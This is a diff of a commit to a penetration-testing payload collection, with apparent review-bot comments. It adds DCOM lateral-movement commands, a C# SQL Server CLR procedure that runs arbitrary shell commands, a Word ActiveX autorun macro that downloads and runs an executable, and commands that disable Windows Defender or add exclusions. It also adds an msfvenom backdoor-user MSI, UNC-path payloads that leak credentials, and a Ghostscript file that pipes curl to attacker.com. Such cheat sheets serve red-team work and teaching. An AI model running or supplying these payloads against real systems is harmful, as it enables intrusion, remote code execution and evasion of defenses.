mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-04 18:40:41 +00:00
DCOM exploitation and MSSQL CLR
This commit is contained in:
parent
bd2166027e
commit
f6b9d63bf8
10 changed files with 296 additions and 10 deletions
@ -66,6 +66,10 @@
- [ReadLAPSPassword](#readlapspassword)
- [ReadGMSAPassword](#readgmsapassword)
- [ForceChangePassword](#forcechangepassword)
- [DCOM Exploitation](#dcom-exploitation)
- [DCOM via MMC Application Class](#dcom-via-mmc-application-class)
- [DCOM via Excel](#dcom-via-excel)
- [DCOM via ShellExecute](#dcom-via-shellexecute)
- [Trust relationship between domains](#trust-relationship-between-domains)
- [Child Domain to Forest Compromise - SID Hijacking](#child-domain-to-forest-compromise---sid-hijacking)
- [Forest to Forest Compromise - Trust Ticket](#forest-to-forest-compromise---trust-ticket)
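Review bot: the TOC additions stop at `DCOM via ShellExecute`, but the section body added in this commit also introduces a `#### DCOM via ShellBrowserWindow` heading; add `- [DCOM via ShellBrowserWindow](#dcom-via-shellbrowserwindow)` after the ShellExecute entry so the TOC matches the headings.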
@ -199,9 +203,9 @@ use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
.\SharpHound.exe -c all -d active.htb -SearchForest
.\SharpHound.exe --EncryptZip --ZipFilename export.zip
.\SharpHound.exe -c all,GPOLocalGroup
.\SharpHound.exe -c all --LDAPUser <UserName> --LDAPPass <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all -d active.htb --LDAPUser <UserName> --LDAPPass <Password> --domaincontroller 10.10.10.100
.\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
.\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
.\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
# or run the collector on the machine using Powershell
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
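Review bot: the flag rename is applied inconsistently inside the hunk: the new `--LdapUsername`/`--LdapPassword` lines still pass `--JSONFolder <PathToFile>`, while the new long command uses `--outputdirectory C:\Windows\Temp`. SharpHound releases that accept `--ldapusername` take `--outputdirectory` (the `--JSONFolder` spelling belongs to the older collector that used `--LDAPUser`), so either update that line too or say which collector version each line targets. The lab values `-d active.htb` and `--domaincontroller 10.10.10.100` would also read better as `<domain>` and `<dc-ip>`, matching the `<UserName>`/`<Password>` placeholders on the same lines.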
@ -1091,6 +1095,17 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
PS > Get-DomainComputer COMPUTER -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
```
* LAPSToolkit - https://github.com/leoloobeek/LAPSToolkit
```powershell
$ Get-LAPSComputers
ComputerName Password Expiration
------------ -------- ----------
exmaple.domain.local dbZu7;vGaI)Y6w1L 02/21/2021 22:29:18
$ Find-LAPSDelegatedGroups
$ Find-AdmPwdExtendedRights
```
* ldapsearch
```powershell
ldapsearch -x -h -D "@" -w -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
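Review bot: the `ldapsearch` line has lost its values: `-h`, `-D "@"` and `-w` are given without a host, bind DN or password, and the line ends in a stray backtick, so it cannot be copied as-is. Write it as `ldapsearch -x -h <dc-ip> -D "<user>@<domain>" -w <password> -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd` (or `-H ldap://<dc-ip>`, since `-h` is the deprecated form). The fence around it is tagged `powershell` although it is a shell command, and the LAPSToolkit sample output has `exmaple.domain.local` for `example.domain.local`.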
@ -1712,6 +1727,58 @@ Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword
```
### DCOM Exploitation
> DCOM is an extension of COM (Component Object Model), which allows applications to instantiate and access the properties and methods of COM objects on a remote computer
#### DCOM via MMC Application Class
This COM object (MMC20.Application) allows you to script components of MMC snap-in operations. there is a method named **"ExecuteShellCommand"** under **Document.ActiveView**.
```ps1
PS C:\> $com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1"))
PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\calc.exe",$null,$null,7)
PS C:\> $com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",$null,"-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string > ","7")
# Weaponized example with MSBuild
PS C:\> [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.1")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",$null,"\\10.10.10.2\webdav\build.xml","7")
```
Invoke-MMC20RCE : https://raw.githubusercontent.com/n0tty/powershellery/master/Invoke-MMC20RCE.ps1
#### DCOM via Excel
```ps1
# Powershell script that injects shellcode into excel.exe via ExecuteExcel4Macro through DCOM
Invoke-Excel4DCOM64.ps1 https://gist.github.com/Philts/85d0f2f0a1cc901d40bbb5b44eb3b4c9
Invoke-ExShellcode.ps1 https://gist.github.com/Philts/f7c85995c5198e845c70cc51cd4e7e2a
# Using Excel DDE
PS C:\> $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "$ComputerName"))
PS C:\> $excel.DisplayAlerts = $false
PS C:\> $excel.DDEInitiate("cmd", "/c calc.exe")
```
#### DCOM via ShellExecute
```ps1
$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.1")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
```
#### DCOM via ShellBrowserWindow
:warning: Windows 10 only, the object doesn't exists in Windows 7
```ps1
$com = [Type]::GetTypeFromCLSID('C08AFD90-F2A1-11D1-8455-00A0C91F3880',"10.10.10.1")
$obj = [System.Activator]::CreateInstance($com)
$obj.Application.ShellExecute("cmd.exe","/c calc.exe","C:\windows\system32",$null,0)
```
### Trust relationship between domains
* One-way
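Review bot: `ExecuteShellCommand` takes the window state as its fourth argument and the MMC20 examples pass it two ways, as the integer `7` in the calc line and as the string `"7"` in the PowerShell and MSBuild lines; use the integer throughout so readers do not copy the quoted variant. The PowerShell line also mixes a junk string with a prose placeholder in `-enc DFDFSFSFSFSFSFSFSDFSFSF < Empire encoded string >`; a single `-enc <base64>` is clearer. In `#### DCOM via Excel` the two gist references are prose sitting inside the ```ps1 fence next to the DDE snippet; move them out as markdown links like `Invoke-MMC20RCE` above. Small wording fixes in the same hunk: "there is a method" needs a capital after the full stop, and the ShellBrowserWindow warning should read "the object doesn't exist in Windows 7".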
@ -2403,3 +2470,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/)
* [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory)
* [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/)
* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/)
* [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques)
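Review bot: the two new references cover the ShellWindows/ShellBrowserWindow and Excel techniques, but nothing is listed for the `MMC20.Application` section that opens the new DCOM chapter; enigma0x3's "round 2" post is the follow-up to his January 5, 2017 post on lateral movement with the MMC20.Application COM object, which is the one that section draws on and should be cited alongside it.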
@ -27,6 +27,7 @@
* [Add the extended stored procedure and list extended stored procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures)
* [CLR Assemblies](#clr-assemblies)
* [Execute commands using CLR assembly](#execute-commands-using-clr-assembly)
* [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it)
* [OLE Automation](#ole-automation)
* [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures)
* [Agent Jobs](#agent-jobs)
@ -217,6 +218,11 @@ Get-SQLStoredProcedureXP -Instance "<DBSERVERNAME\DBInstance>" -Verbose
## CLR Assemblies
Prerequisites:
* sysadmin privileges
* CREATE ASSEMBLY permission (or)
* ALTER ASSEMBLY permission (or)
### Execute commands using CLR assembly
```ps1
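Review bot: the prerequisite list does not match the procedure that follows it. Loading an assembly `WITH PERMISSION_SET = UNSAFE`, as the next section does, is not possible with `CREATE ASSEMBLY` or `ALTER ASSEMBLY` permission alone: the target database must be `TRUSTWORTHY ON` with an owner holding `UNSAFE ASSEMBLY` (or the assembly must be signed and its key trusted), and sysadmin on its own does not bypass that check. Reword the bullets so the `(or)` is not dangling, for example "sysadmin, or `CREATE ASSEMBLY`/`ALTER ASSEMBLY` permission, plus a TRUSTWORTHY database for UNSAFE assemblies".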
@ -225,6 +231,93 @@ or
Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
```
### Manually creating a CLR DLL and importing it
Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs`
```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;
using System.IO;
using System.Diagnostics;
using System.Text;
public partial class StoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
public static void cmd_exec (SqlString execCommand)
{
Process proc = new Process();
proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";
proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();
// Create the record and specify the metadata for the columns.
SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));
// Mark the beginning of the result set.
SqlContext.Pipe.SendResultsStart(record);
// Set values for each column in the row
record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());
// Send the row back to the client.
SqlContext.Pipe.SendResultsRow(record);
// Mark the end of the result set.
SqlContext.Pipe.SendResultsEnd();
proc.WaitForExit();
proc.Close();
}
};
```
Then follow these instructions:
1. Enable `show advanced options` on the server
```sql
sp_configure 'show advanced options',1;
RECONFIGURE
GO
```
2. Enable CLR on the server
```sql
sp_configure 'clr enabled',1
RECONFIGURE
GO
```
3. Import the assembly
```sql
CREATE ASSEMBLY my_assembly
FROM 'c:\temp\cmd_exec.dll'
WITH PERMISSION_SET = UNSAFE;
```
4. Link the assembly to a stored procedure
```sql
CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];
GO
```
5. Execute and clean
```sql
cmd_exec "whoami"
DROP PROCEDURE cmd_exec
DROP ASSEMBLY my_assembly
```
**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL
```sql
CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM
0x4D5A90000300000004000000F[TRUNCATED]
WITH PERMISSION_SET = UNSAFE
GO
```
## OLE Automation
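Review bot: step 3 fails on a default database: `CREATE ASSEMBLY my_assembly FROM 'c:\temp\cmd_exec.dll' WITH PERMISSION_SET = UNSAFE` is rejected unless the database is marked `ALTER DATABASE <db> SET TRUSTWORTHY ON` (with an owner that holds `UNSAFE ASSEMBLY`), and on SQL Server 2017 and later `clr strict security` must additionally be turned off with `sp_configure 'clr strict security', 0` or the DLL registered through `sp_add_trusted_assembly`. Add that as a step between "Enable CLR" and "Import the assembly", and undo it in step 5 alongside the `DROP` statements. In step 5, `cmd_exec "whoami"` only parses when `QUOTED_IDENTIFIER` is OFF (with the SSMS default it is treated as an identifier); use `EXEC cmd_exec 'whoami'`. In the C# source, `System.IO`, `System.Text` and `System.Data.SqlClient` are unused and `.ToString()` on `proc.StandardOutput.ReadToEnd()` is redundant.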
@ -436,4 +529,5 @@ SELECT SYSTEM_USER
## References
* [PowerUpSQL Cheat Sheet & SQL Server Queries - Leo Pitt](https://medium.com/@D00MFist/powerupsql-cheat-sheet-sql-server-queries-40e1c418edc3)
* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
* [PowerUpSQL Cheat Sheet - Scott Sutherland](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)
* [Attacking SQL Server CLR Assemblies - Scott Sutherland - July 13th, 2017](https://blog.netspi.com/attacking-sql-server-clr-assemblies/)
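Review bot: the `PowerUpSQL Cheat Sheet - Scott Sutherland` entry appears twice in this hunk; if the second copy is only the old last line re-emitted because a trailing newline was added, fine, otherwise drop the duplicate. The new "Attacking SQL Server CLR Assemblies" reference covers the same technique as the `### Manually creating a CLR DLL and importing it` section above, so it is worth linking inline from that section as well as listing it here.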
@ -13,11 +13,12 @@
* [DOCM - C# converted to Office VBA macro](#docm---c-converted-to-office-vba-macro)
* [DOCM - VBA Wscript](#docm---vba-wscript)
* [DOCM - VBA Shell Execute Comment](#docm---vba-shell-execute-comment)
* [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchost-exe-using-scheduled-task)
* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions-vba-amsi)
* [DOCM - VBA Spawning via svchost.exe using Scheduled Task](#docm---vba-spawning-via-svchostexe-using-scheduled-task)
* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions)
* [DOCM - winmgmts](#docm---winmgmts)
* [DOCM - Macro Pack - Macro and DDE](#dcom---macro-pack---macro-and-dde)
* [DOCM - Macro Pack - Macro and DDE](#docmxlm---macro-pack---macro-and-dde)
* [DOCM - CACTUSTORCH VBA Module](#docm---cactustorch-vba-module)
* [DOCM - MMG with Custom DL + Exec](#docm---mmg-with-custom-dl--exec)
* [VBA Obfuscation](#vba-obfuscation)
* [VBA Purging](#vba-purging)
* [OfficePurge](#officepurge)
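Review bot: the re-anchored line `* [DCOM - WMI COM functions (VBA AMSI)](#docm---wmi-com-functions)` now points at the renamed `## DOCM - WMI COM functions` heading but keeps the old display text: `DCOM` should be `DOCM`, and the `(VBA AMSI)` suffix no longer matches the heading. The TOC also gets no entry for the new `## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro` section added further down in this commit.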
@ -221,6 +222,12 @@ Sub Auto_Open()
End Sub
```
```vb
CreateObject("WScript.Shell").Run "calc.exe"
CreateObject("WScript.Shell").Exec "notepad.exe"
```
## DOCM - VBA Shell Execute Comment
Set your command payload inside the **Comment** metadata of the document.
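Review bot: the new ```vb block with `CreateObject("WScript.Shell").Run "calc.exe"` and `.Exec "notepad.exe"` is appended directly after the previous code block with no sentence between them; add one line saying these are the one-liner forms of the `WScript.Shell` macro above (and that `Exec` returns a `WshScriptExec` object with the process handle while `Run` returns the exit code), otherwise it reads as a second, unexplained copy of the same technique.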
@ -271,6 +278,8 @@ Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadst
## DOCM - WMI COM functions
Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)`
```ps1
Sub wmi_exec()
strComputer = "."
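Review bot: the code under the renamed `## DOCM - WMI COM functions` heading is VBA (`Sub wmi_exec()`, `strComputer = "."`) but is fenced as ```ps1; tag it ```vb like the WScript block earlier in the file so the language hint and highlighting are right. The inline one-liner marked `(detected by Defender)` is useful context, but it would be clearer as its own fenced line with a short note on what the following `wmi_exec` variant changes to avoid that detection.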
@ -307,6 +316,11 @@ Sub AutoOpen()
End Sub
```
```ps1
Const ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"
Set SW = GetObject("new:" & ShellWindows).Item()
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0
```
## DOCM/XLM - Macro Pack - Macro and DDE
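Review bot: the new snippet starting `Const ShellWindows = "{9BA05972-F6A8-11CF-A442-00A0C90A8F39}"` is inserted with no heading or lead-in and is fenced as ```ps1 although it is VBA. Give it a sentence explaining that `GetObject("new:" & ShellWindows)` instantiates the ShellWindows COM object by CLSID through the `new:` moniker and then calls `ShellExecute` on the shell's `Application` object, fence it ```vb, and cross-reference the `DCOM via ShellExecute` section of the Active Directory page, which uses the same CLSID remotely.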
@ -416,7 +430,7 @@ python MMG.py configs/generic-cmd.json malicious.vba
}
```
```ps1
```vb
Private Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Public Function DownloadFileA(ByVal URL As String, ByVal DownloadPath As String) As Boolean
@ -443,6 +457,18 @@ Sub Auto_Open()
End Sub
```
## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control`
```vb
Private Sub InkPicture1_Painted(ByVal hDC As Long, ByVal Rect As MSINKAUTLib.IInkRectangle)
Run = Shell("cmd.exe /c PowerShell (New-Object System.Net.WebClient).DownloadFile('https://<host>/file.exe','file.exe');Start-Process 'file.exe'", vbNormalFocus)
End Sub
```
## VBA Obfuscation
```ps1
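Review bot: the new `## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro` section is not added to the TOC at the top of the file. In the snippet, `Run = Shell("cmd.exe /c PowerShell ...", vbNormalFocus)` assigns to an undeclared variable, which fails under `Option Explicit`; either declare it or call `Shell` as a statement. Since `Painted` fires on every repaint of the control, the handler should also guard against launching the payload repeatedly (a module-level flag checked at the top of the `Sub`). The `<host>` placeholder is fine.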
@ -619,4 +645,5 @@ E
* [WordAMSIBypass - rmdavy](https://github.com/rmdavy/WordAmsiBypass)
* [Dechaining macros and evading EDR - Noora Hyvärinen](https://blog.f-secure.com/dechaining-macros-and-evading-edr/)
* [Executing macros from docx with remote - RedXORBlueJuly 18, 2018](http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html)
* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/)
* [One thousand and one ways to copy your shellcode to memory (VBA Macros) - X-C3LL - Feb 18, 2021](https://adepts.of0x.cc/alternatives-copy-shellcode/)
* [Running macros via ActiveX controls - greyhathacker - September 29, 2016](http://www.greyhathacker.net/?p=948)
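Review bot: the X-C3LL "One thousand and one ways to copy your shellcode to memory" entry appears twice; drop one copy unless the duplication is only the trailing-newline artifact of the diff. The unchanged entry above it, `RedXORBlueJuly 18, 2018`, is missing the ` - ` separator the other references use between author and date.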
@ -17,6 +17,7 @@
* [Use Powershell Version 2 - No AMSI Support there](#Using-PowerShell-version-2)
* [Nishang all in one](#Nishang-all-in-one)
* [Adam Chesters Patch](#Adam-Chester-Patch)
* [AMSI.fail](#amsifail)
## Which Endpoint Protection is Using AMSI
@ -735,6 +736,11 @@ Add-Type -TypeDefinition $Winpatch -Language CSharp
[patch]::it()
```
## AMSI.fail
> AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/
## References
* [S3cur3Th1sSh1t - Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/blob/master/README.md)
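Review bot: the new `## AMSI.fail` section consists only of the site's own blurb; every other section in this file shows at least one command. Add the URL as a markdown link, one sentence on how the output is used (generate a snippet on the site, paste it into the PowerShell session before loading any tooling), and put the `- https://amsi.fail/` attribution on its own line rather than inside the quoted paragraph.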
@ -254,6 +254,8 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
## Antivirus & Detections
Enumerate antivirus on a box with `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName`
### Windows Defender
```powershell
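Review bot: the `WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName` enumeration only works on client editions of Windows; the `SecurityCenter2` namespace does not exist on Windows Server, where the command errors out, so add that caveat and point at `Get-MpComputerStatus` in the Defender subsection as the server-side check. `wmic` is also deprecated on current Windows builds, so listing the `Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct` equivalent next to it would help.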
@ -263,6 +265,13 @@ PS C:\> Get-MpComputerStatus
# disable Real Time Monitoring
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
PS C:\> Set-MpPreference -DisableIOAVProtection $true
# disable AMSI (set to 0 to enable)
PS C:\> Set-MpPreference -DisableScriptScanning 1
# exclude a folder
PS C:\> Add-MpPreference -ExclusionPath "C:\Temp"
PS C:\> Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
```
### AppLocker Enumeration
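Review bot: the comment `# disable AMSI (set to 0 to enable)` above `Set-MpPreference -DisableScriptScanning 1` is misleading: that setting turns off Defender's script scanning (Defender's own AMSI provider), not AMSI itself, so other AMSI consumers are unaffected; reword it to "disable Defender script scanning". For consistency with the `-DisableRealtimeMonitoring $true` and `-DisableIOAVProtection $true` lines, pass `$true`/`$false` rather than `1`/`0`. All of these `Set-MpPreference`/`Add-MpPreference` calls require local admin and are refused while Tamper Protection is enabled, which deserves one line at the top of the block.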
@ -777,16 +786,23 @@ Check if these registry values are set to "1".
```bat
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ Get-ItemProperty HKLM\Software\Policies\Microsoft\Windows\Installer
$ Get-ItemProperty HKCU\Software\Policies\Microsoft\Windows\Installer
```
Then create an MSI package and install it.
```powershell
$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
$ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi-nouac -o evil.msi
$ msiexec /quiet /qn /i C:\evil.msi
```
Technique also available in Metasploit : `exploit/windows/local/always_install_elevated`
Technique also available in :
* Metasploit : `exploit/windows/local/always_install_elevated`
* PowerUp.ps1 : `Get-RegistryAlwaysInstallElevated`, `Write-UserAddMSI`
## EoP - Insecure GUI apps
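Review bot: the check block is fenced ```bat but mixes `reg query` with the PowerShell cmdlet `Get-ItemProperty`, and every line carries a `$` prompt that neither cmd nor PowerShell uses; split it into a cmd block and a ```powershell block, or drop the prompts. The second block is fenced ```powershell but the `msfvenom` lines run on the attacker host and `msiexec /quiet /qn /i C:\evil.msi` on the target, so label the two sides. The surrounding text `Check if these registry values are set to "1"` should state that both the HKLM and the HKCU `AlwaysInstallElevated` values must be 1 for the technique to work.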
@ -202,6 +202,7 @@ PS C:\> wmic /node:target.domain /user:domain\user /password:password process ca
## Psexec.py / Smbexec.py / Wmiexec.py
From [Impacket](https://github.com/SecureAuthCorp/impacket) (:warning: renamed to impacket-xxx in Kali)
:warning: `get` / `put` for wmiexec, psexec, smbexec, and dcomexec are changing to `lget` and `lput`.
```powershell
root@payload$ git clone https://github.com/CoreSecurity/impacket.git
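Review bot: the new warning that `get`/`put` "are changing to `lget` and `lput`" should name the impacket release that introduced the rename, otherwise readers on older packages cannot tell which spelling applies to them. The clone line below still points at `https://github.com/CoreSecurity/impacket.git` while the link in the sentence above uses `SecureAuthCorp/impacket`; use one URL.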
@ -208,6 +208,21 @@ MSSQL supports stacked queries so we can create a variable pointing to our IP ad
1'; use master; exec xp_dirtree '\\10.10.15.XX\SHARE';--
```
```sql
xp_dirtree '\\attackerip\file'
xp_fileexist '\\attackerip\file'
BACKUP LOG [TESTING] TO DISK = '\\attackerip\file'
BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'
RESTORE LOG [TESTING] FROM DISK = '\\attackerip\file'
RESTORE DATABASE [TESTING] FROM DISK = '\\attackerip\file'
RESTORE HEADERONLY FROM DISK = '\\attackerip\file'
RESTORE FILELISTONLY FROM DISK = '\\attackerip\file'
RESTORE LABELONLY FROM DISK = '\\attackerip\file'
RESTORE REWINDONLY FROM DISK = '\\attackerip\file'
RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
```
## MSSQL Make user DBA (DB admin)
```sql
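Review bot: `BACKUP DATABASE [TESTING] TO DISK = '\\attackeri\file'` has a typo in the host (`attackeri` for `attackerip`). The list also mixes primitives with very different prerequisites: `xp_dirtree` and `xp_fileexist` are executable by any login, whereas the `BACKUP`/`RESTORE` variants need an existing `TESTING` database and backup/restore permission (db_backupoperator, db_owner or sysadmin); a one-line note on which ones work from a low-privilege login would help readers choose.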
@ -252,3 +267,4 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
* [MSSQL Trusted Links - HackTricks.xyz](https://book.hacktricks.xyz/windows/active-directory-methodology/mssql-trusted-links)
* [SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! - Antti Rantasaari - June 6th, 2013](https://blog.netspi.com/how-to-hack-database-links-in-sql-server/)
* [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
* [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
@ -30,6 +30,7 @@ Attempting to manipulate SQL queries may have goals including:
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
* [SQLmap without SQL injection](#sqlmap-without-sql-injection)
* [Authentication bypass](#authentication-bypass)
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
* [Polyglot injection](#polyglot-injection-multicontext)
@ -200,6 +201,7 @@ sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
### General tamper option and tamper's list
```powershell
@ -267,6 +269,14 @@ tamper=name_of_the_tamper
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
### SQLmap without SQL injection
You can use SQLmap to access a database via its port instead of a URL.
```ps1
sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
```
## Authentication bypass
```sql
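Review bot: the example does not match the sentence above it. The text says the database is reached "via its port", but `sqlmap.py -d "mysql://user:pass@ip/database" --dump-all` carries no port; sqlmap's direct-connection form is `DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME`. Also mention that `-d` needs the matching Python driver installed (PyMySQL for `mysql://`), which sqlmap does not bundle, and fence the command as ```bash rather than ```ps1.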
@ -0,0 +1,6 @@
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%curl http://attacker.com/?a=callback) currentdevice putdeviceprops
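Review bot: the new PostScript file has no comment saying what it is or where it is referenced. Add a `%` comment line after `%!PS` naming the technique (Ghostscript `-dSAFER` bypass that reaches the `%pipe%` device through `/OutputFile ... currentdevice putdeviceprops`, which only works on Ghostscript builds where that bypass is unpatched) and the README section that links to this file, and replace `http://attacker.com/?a=callback` with the `<attacker>`-style placeholder used elsewhere in the repository.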
@ -26,6 +26,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
- [XXE OOB Attack (Yunusov, 2013)](#xxe-oob-attack-yusonov---2013)
- [XXE OOB with DTD and PHP filter](#xxe-oob-with-dtd-and-php-filter)
- [XXE OOB with Apache Karaf](#xxe-oob-with-apache-karaf)
- [Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents](#windows-local-dtd-and-side-channel-leak-to-disclose-http-responsefile-contents)
- [XXE in exotic files](#xxe-in-exotic-files)
- [XXE inside SVG](#xxe-inside-svg)
- [XXE inside SOAP](#xxe-inside-soap)
@ -250,6 +251,9 @@ i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
## Exploiting blind XXE to exfiltrate data out-of-band
Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.
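Review bot: this hunk only inserts three extra blank lines before `## Exploiting blind XXE to exfiltrate data out-of-band`; markdown needs a single blank line between the closing fence and the heading, so drop the extras.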
@ -372,6 +376,43 @@ Assuming payloads such as the previous return a verbose error. You can start poi
[Other payloads using different DTDs](https://github.com/GoSecure/dtd-finder/blob/master/list/xxe_payloads.md)
## Windows Local DTD and Side Channel Leak to disclose HTTP response/file contents
From https://gist.github.com/infosec-au/2c60dc493053ead1af42de1ca3bdcc79
### Disclose local file
```xml
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY % file SYSTEM "file://D:\webserv2\services\web.config">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file://t/#%file;'>">
%eval;
%error;
<!ENTITY test "test"'
>
